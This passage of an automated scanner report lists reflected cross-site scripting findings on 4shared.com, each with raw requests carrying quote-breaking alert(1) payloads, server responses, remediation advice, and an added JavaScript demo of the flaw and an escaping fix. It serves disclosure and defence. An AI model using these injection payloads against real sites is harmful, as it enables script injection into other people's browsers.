Date: Wed, 23 Feb 2011 23:10:37 GMT
Connection: close
Content-Length: 36108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/index.jspe191f"-alert(1)-"6e354f00eec";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.339. http://www.4shared.com/js/index.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab098"-alert(1)-"8cd6f08d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsab098"-alert(1)-"8cd6f08d9/index.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsab098&quot;-alert(1)-&quot;8cd6f08d9/index.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=57CB8FCED9A0A676750D873D115BEA0A.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:25 GMT
Content-Length: 36820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/jsab098"-alert(1)-"8cd6f08d9/index.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.340. http://www.4shared.com/js/index.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efa86"-alert(1)-"df4c1953dcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/index.jsefa86"-alert(1)-"df4c1953dcc?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/index.jsefa86&quot;-alert(1)-&quot;df4c1953dcc
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BDFBB8D835A68248C340B07013F288A2.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:33 GMT
Content-Length: 36818


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/index.jsefa86"-alert(1)-"df4c1953dcc";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.341. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/loginScript.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55f12"-alert(1)-"f7aecd99122 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js55f12"-alert(1)-"f7aecd99122/loginScript.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js55f12&quot;-alert(1)-&quot;f7aecd99122/loginScript.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3E73AECAF5C0BAC4CA79DF79445828D0.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:31 GMT
Content-Length: 36855


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js55f12"-alert(1)-"f7aecd99122/loginScript.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.342. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/loginScript.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de174"-alert(1)-"725a9c623ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/loginScript.jspde174"-alert(1)-"725a9c623ce?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/loginScript.jspde174&quot;-alert(1)-&quot;725a9c623ce
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=73266099C7D574540CC4E6F42B2C66F0.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:39 GMT
Content-Length: 36168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/loginScript.jspde174"-alert(1)-"725a9c623ce";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.343. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe0b9"-alert(1)-"c10b6d0808b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfe0b9"-alert(1)-"c10b6d0808b/signup-script.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsfe0b9&quot;-alert(1)-&quot;c10b6d0808b/signup-script.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E24C1E87E4B669F1C8521481DBCB7839.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:29 GMT
Content-Length: 36876


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/jsfe0b9"-alert(1)-"c10b6d0808b/signup-script.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback(
...[SNIP]...

1.344. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd94"-alert(1)-"07633452741 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be embedded, it should be written with an encoder made for JavaScript string literals (one that escapes quotes, backslashes, line terminators and the < and > characters as \xHH or \uHHHH sequences); the HTML-entity encoding that this response applies to its status line does not protect a script block, and here the script block receives the raw request path.

Request

GET /js/signup-script.jsp8cd94"-alert(1)-"07633452741?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jsp8cd94&quot;-alert(1)-&quot;07633452741
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A2D2D02377B86E002D082324E7FF1D94.dc7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:37 GMT
Content-Length: 36172


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/signup-script.jsp8cd94"-alert(1)-"07633452741";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...
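The response above shows the sink: the server writes the request path straight into the double-quoted string assigned to url inside reportAbuse(), so a quote in the path terminates the literal and whatever follows is parsed as code. The JavaScript below is an added example, not 4shared's code and not the scanner's; the JSP that emits this script is not on this page, so the two template functions are an assumption about it, and only the generated statement is taken from the report. It reproduces the breakout with the payload from finding 1.344 and shows the fix: serialise the value with JSON.stringify, then escape <, >, &, U+2028 and U+2029 as \uXXXX so that neither a closing quote nor a </script> sequence in the data can leave the literal.

```javascript
// Added example (not 4shared's code): the reportAbuse() sink reconstructed,
// alongside a safe serialiser. The template text is an assumption; the
// generated statement matches the script block in the report.

// Vulnerable: the raw request path is concatenated into a double-quoted literal.
function buildAbuseScriptVulnerable(requestPath) {
  return 'var url="/abuse.jsp?aLink=http://www.4shared.com' + requestPath + '";';
}

// Serialise arbitrary text as a JS string literal that is safe inside <script>.
// JSON.stringify escapes quotes, backslashes and control characters; the
// replace() turns the characters the HTML parser cares about, plus the two
// line terminators JSON leaves raw, into \uXXXX escapes.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, function (c) {
    return '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0');
  });
}

// Fixed: the whole value goes through the serialiser, delimiters included.
function buildAbuseScriptSafe(requestPath) {
  return 'var url=' + jsStringLiteral('/abuse.jsp?aLink=http://www.4shared.com' + requestPath) + ';';
}

// Execute the generated statement in an isolated scope with a recording
// alert(), and report what `url` became and whether alert() fired.
function runGenerated(script) {
  var calls = [];
  var fn = new Function('alert', script + ' return url;');
  var url = fn(function (x) { calls.push(x); return 0; });
  return { url: url, alertCalls: calls };
}

// Payload path from finding 1.344; the hex markers are the report's own.
var PAYLOAD_PATH = '/js/signup-script.jsp8cd94"-alert(1)-"07633452741';

if (typeof require !== 'undefined' && require.main === module) {
  var vuln = runGenerated(buildAbuseScriptVulnerable(PAYLOAD_PATH));
  var safe = runGenerated(buildAbuseScriptSafe(PAYLOAD_PATH));
  console.log('vulnerable: alert fired ' + vuln.alertCalls.length + ' time(s), url = ' + vuln.url);
  console.log('fixed:      alert fired ' + safe.alertCalls.length + ' time(s), url = ' + safe.url);
}
```

With the vulnerable template the injected alert(1) runs and url collapses to NaN (the two string fragments are subtracted); with the safe template alert() never runs and url is exactly the submitted path. The same serialiser is what a JSP tag library's JavaScript-string escaper should produce; the HTML-attribute or HTML-text escaper used for the status line is the wrong encoder for this context.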

1.345. http://www.4shared.com/loginBox.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /loginBox.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15fe3"-alert(1)-"13719462e8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be embedded, it should be written with an encoder made for JavaScript string literals (one that escapes quotes, backslashes, line terminators and the < and > characters as \xHH or \uHHHH sequences); the HTML-entity encoding that this response applies to its status line does not protect a script block, and here the script block receives the raw request path.

Request

GET /loginBox.jsp15fe3"-alert(1)-"13719462e8f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /loginBox.jsp15fe3&quot;-alert(1)-&quot;13719462e8f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=92FE70F5A3203E5B91958B63EB8FC1BD.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/loginBox.jsp15fe3"-alert(1)-"13719462e8f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.346. http://www.4shared.com/m/android.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/android.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9395b"-alert(1)-"96bc668bd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be embedded, it should be written with an encoder made for JavaScript string literals (one that escapes quotes, backslashes, line terminators and the < and > characters as \xHH or \uHHHH sequences); the HTML-entity encoding that this response applies to its status line does not protect a script block, and here the script block receives the raw request path.

Request

GET /m9395b"-alert(1)-"96bc668bd2/android.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m9395b&quot;-alert(1)-&quot;96bc668bd2/android.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6BC1AAE839A91BD67907F851E8D3402D.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:38 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m9395b"-alert(1)-"96bc668bd2/android.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.347. http://www.4shared.com/m/android.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/android.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ed12"-alert(1)-"ff9a528e7d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be embedded, it should be written with an encoder made for JavaScript string literals (one that escapes quotes, backslashes, line terminators and the < and > characters as \xHH or \uHHHH sequences); the HTML-entity encoding that this response applies to its status line does not protect a script block, and here the script block receives the raw request path.

Request

GET /m/android.jsp4ed12"-alert(1)-"ff9a528e7d7 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/android.jsp4ed12&quot;-alert(1)-&quot;ff9a528e7d7
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7086C84FC8FF96049E03701F16AE0CAE.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m/android.jsp4ed12"-alert(1)-"ff9a528e7d7";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.348. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/blackberry.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c39b"-alert(1)-"ba8c575a95c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be embedded, it should be written with an encoder made for JavaScript string literals (one that escapes quotes, backslashes, line terminators and the < and > characters as \xHH or \uHHHH sequences); the HTML-entity encoding that this response applies to its status line does not protect a script block, and here the script block receives the raw request path.

Request

GET /m2c39b"-alert(1)-"ba8c575a95c/blackberry.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m2c39b&quot;-alert(1)-&quot;ba8c575a95c/blackberry.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A4F0296C826302157650E9633BE16FD7.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:40 GMT
Connection: close
Content-Length: 36132


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m2c39b"-alert(1)-"ba8c575a95c/blackberry.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

1.349. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/blackberry.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69a6b"-alert(1)-"80db2a41027 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be embedded, it should be written with an encoder made for JavaScript string literals (one that escapes quotes, backslashes, line terminators and the < and > characters as \xHH or \uHHHH sequences); the HTML-entity encoding that this response applies to its status line does not protect a script block, and here the script block receives the raw request path.

Request

GET /m/blackberry.jsp69a6b"-alert(1)-"80db2a41027 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/blackberry.jsp69a6b&quot;-alert(1)-&quot;80db2a41027
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=95403D84C0034F17BA2CB6B67773D206.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36132


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m/blackberry.jsp69a6b"-alert(1)-"80db2a41027";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.350. http://www.4shared.com/m/symbian.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/symbian.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6ba5"-alert(1)-"f2530800432 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

